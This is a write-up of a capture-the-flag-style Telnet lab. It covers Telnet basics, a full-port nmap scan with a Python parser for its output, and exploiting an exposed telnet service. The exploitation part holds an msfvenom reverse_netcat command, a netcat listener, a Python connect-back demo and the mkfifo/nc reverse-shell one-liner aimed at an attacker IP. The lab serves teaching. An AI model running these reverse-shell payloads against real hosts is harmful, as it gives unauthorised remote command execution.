Hacking Network Services: LAB2: Telnet.

What is Telnet?

Telnet is an application protocol which allows you, with the use of a telnet client, to connect to and execute commands on a remote machine that's hosting a telnet server.

The telnet client establishes a TCP connection to the server and then acts as a virtual terminal, letting you interact with the remote host as if you were sitting at its console.

Replacement

Telnet sends everything, credentials included, in clear text and has no built-in security mechanisms, so anyone on the network path can read or tamper with the session. For that reason it has been replaced by SSH in most deployments, and where you still find it in the wild it is a strong sign of a legacy or poorly maintained host.

How does Telnet work?

The user connects to the server with a telnet client, which usually means running "telnet" from a command prompt. Once connected, the user types commands at the remote prompt and the server executes them. You can connect to a telnet server with the following syntax: "telnet [ip] [port]". If you leave the port off, the client uses the protocol's default, TCP port 23.

-----------------------------------------------------------------------------------------------

Enumerating Telnet

A telnet service bound to a non-standard port will not show up in a default nmap scan, which only covers nmap's list of the 1000 most common ports. It's important to try every angle when enumerating, as the information you gather here will inform your exploitation stage. The scan below covers all 65535 TCP ports (-p-) with OS and service detection (-A). -T5 is the fastest timing template and can miss ports on a slow or lossy link, so drop to -T4 if the results look incomplete.

nmap -vv -T5 -p- -A $ip
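A full-port scan returns a lot of lines, and the interesting result in this lab is an open port that nmap cannot name. The following is an added example, not code from the original post: it parses nmap's grepable (-oG) output and flags open ports that need a manual connect, either because nmap could not identify the service or because the service answers on a port other than its usual one. The sample scan output, the target address 10.10.10.10 and the ports shown are constructed for the demo.

```python
"""Triage a full-port nmap scan saved with -oG (added example, not part of the post).

In grepable output the Ports field is a comma-separated list of entries of the
form port/state/proto/owner/service/rpc/version; nmap replaces "/" inside a
version string with "|", so splitting on "/" is safe.
"""

# Constructed sample of `nmap -sV -p- -oG scan.gnmap 10.10.10.10`; the target,
# ports and banners are made up for this demo.
SAMPLE_GNMAP = (
    "# Nmap 7.80 scan initiated as: nmap -sV -p- -oG scan.gnmap 10.10.10.10\n"
    "Host: 10.10.10.10 ()\tStatus: Up\n"
    "Host: 10.10.10.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.6p1 Ubuntu/, "
    "8012/open/tcp//unknown///\tIgnored State: closed (65533)\n"
    "# Nmap done -- 1 IP address (1 host up) scanned in 120.00 seconds\n"
)

PORT_FIELDS = ("port", "state", "proto", "owner", "service", "rpc", "version")

# IANA default ports for the services this lab series covers. A service that
# nmap names but that answers elsewhere is worth a manual look.
DEFAULT_PORTS = {"ftp": 21, "ssh": 22, "telnet": 23, "smtp": 25, "http": 80, "smb": 445}


def parse_gnmap(text):
    """Return {host_ip: [port records]} for every Host line carrying a Ports field."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "\tPorts: " not in line:
            continue
        cols = line.split("\t")
        ip = cols[0].split()[1]
        ports_field = next(c for c in cols if c.startswith("Ports: "))[len("Ports: "):]
        records = []
        for entry in ports_field.split(", "):
            rec = dict(zip(PORT_FIELDS, entry.split("/")))
            rec["port"] = int(rec["port"])
            records.append(rec)
        hosts.setdefault(ip, []).extend(records)
    return hosts


def open_ports(hosts):
    """Keep only ports nmap reported as open."""
    return {ip: [r for r in recs if r["state"] == "open"] for ip, recs in hosts.items()}


def follow_up_candidates(hosts):
    """Open ports that deserve a manual connect: the service is unnamed, or it is
    a known service sitting on a non-standard port (nmap appends '?' to guesses)."""
    out = {}
    for ip, recs in open_ports(hosts).items():
        flagged = []
        for r in recs:
            name = r["service"].rstrip("?")
            unnamed = name in ("", "unknown")
            off_port = name in DEFAULT_PORTS and DEFAULT_PORTS[name] != r["port"]
            if unnamed or off_port:
                flagged.append(r)
        if flagged:
            out[ip] = flagged
    return out


if __name__ == "__main__":
    for ip, recs in follow_up_candidates(parse_gnmap(SAMPLE_GNMAP)).items():
        for r in recs:
            svc = r["service"] or "?"
            print(f"{ip}:{r['port']}/{r['proto']} service={svc} -> try: telnet {ip} {r['port']}")
```

Run it against a real file with `parse_gnmap(open("scan.gnmap").read())`; anything it prints is a port to connect to by hand and banner-grab, which is exactly how the non-standard telnet port in this lab is found.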

-----------------------------------------------------------------------------------------------

Exploiting Telnet

--------------------------

What is a Reverse Shell?

A "shell" can simply be described as a piece of code or a program that gives you code or command execution on a device.

A reverse shell is a type of shell in which the target machine initiates the connection back to the attacking machine. This matters because inbound connections to the target are often blocked by a firewall, while outbound connections from it are not.

The attacking machine has a listening port on which it receives that connection, and the target's shell is wired to the socket, so we achieve code or command execution on the target.

Connect to the service on the port found during enumeration: "telnet [ip] [port]"

Check whether what we type at the prompt is executed as a system command on the target. A reliable way to do that is to have the target ping our attacking machine while we capture ICMP on our end; if echo requests arrive, we have command execution:

sudo tcpdump ip proto \\icmp -i tun0

The general form is tcpdump -i [interface]; on TryHackMe the VPN interface is tun0, which is why it appears above.

"msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R"

This generates a netcat reverse-shell one-liner for us: a mkfifo/nc pipeline that connects back to lhost:lport and wires that socket to /bin/sh.

* -p = payload

* lhost = our local host IP address (this is your machine's IP address)

* lport = the port to listen on (this is the port on your machine)

* R = export the payload in raw format

nc -lvp [port]

-l: listen mode, for inbound connects

-v: verbose

-p: specify the local port (in our case, the port we are listening to)

Running the payload from the telnet session: .RUN [the payload]. The target connects back to our netcat listener and we get a shell on it.
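To make the reverse-shell flow concrete, here is an added example that is my own code, not the lab's payload or msfvenom output. It runs both ends over loopback: start_listener() plays the role of nc -lvp, connect_back() plays the role of the target executing the payload (connecting out to the listener, running a command and sending the output back over the socket), and netcat_fifo_payload() shows the well-known shape of the one-liner that cmd/unix/reverse_netcat produces. The addresses, ports and the command executed are assumptions for the demo; a real payload hands the socket to an interactive /bin/sh instead of a single command.

```python
"""Reverse shell mechanics over loopback (added example, not from the post)."""
import socket
import subprocess
import sys
import threading


def start_listener(host="127.0.0.1", port=0):
    """Equivalent of `nc -lvp <port>`: bind, listen, return the socket and bound port.
    port=0 lets the OS pick a free port so the demo never collides with anything."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    return srv, srv.getsockname()[1]


def connect_back(lhost, lport, argv):
    """What the target does when the payload fires: open a TCP connection *out*
    to the attacker's listener, run a command, push stdout+stderr over the socket.
    A real reverse shell loops on /bin/sh; one command is enough to show the direction."""
    with socket.create_connection((lhost, lport), timeout=5) as s:
        result = subprocess.run(argv, capture_output=True)
        s.sendall(result.stdout + result.stderr)


def receive_output(srv, timeout=5):
    """Attacker side: accept the connect-back and read until the peer closes."""
    srv.settimeout(timeout)
    conn, peer = srv.accept()
    conn.settimeout(timeout)
    chunks = []
    with conn:
        while True:
            data = conn.recv(4096)
            if not data:
                break
            chunks.append(data)
    return peer, b"".join(chunks)


def netcat_fifo_payload(lhost, lport, fifo="/tmp/f"):
    """Shape of the classic netcat reverse shell one-liner (the form msfvenom's
    cmd/unix/reverse_netcat emits, modulo a random fifo name). The fifo feeds
    nc's stdin from /bin/sh's stdout, so the socket becomes the shell's terminal."""
    return f"mkfifo {fifo}; nc {lhost} {lport} 0<{fifo} | /bin/sh >{fifo} 2>&1; rm {fifo}"


def demo():
    """Run listener and connect-back in one process; returns (peer_ip, output)."""
    srv, port = start_listener()
    # Assumed command for the demo: the target prints a marker string.
    argv = [sys.executable, "-c", "print('reverse shell works')"]
    target = threading.Thread(target=connect_back, args=("127.0.0.1", port, argv))
    target.start()
    try:
        peer, output = receive_output(srv)
    finally:
        target.join()
        srv.close()
    return peer[0], output.decode().strip()


if __name__ == "__main__":
    print("payload:", netcat_fifo_payload("10.8.0.2", 4444))
    print("received from", *demo())
```

The listener never reaches out to the target; it only accepts. That is the whole point of the reverse direction: once .RUN executes the one-liner, the target is the one opening the connection, so the firewall rules that would block an inbound bind shell do not apply.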

-----------------------------------------------------------------------------------------------------------------------------

Thanks for reading!

Roger - Ozz961.
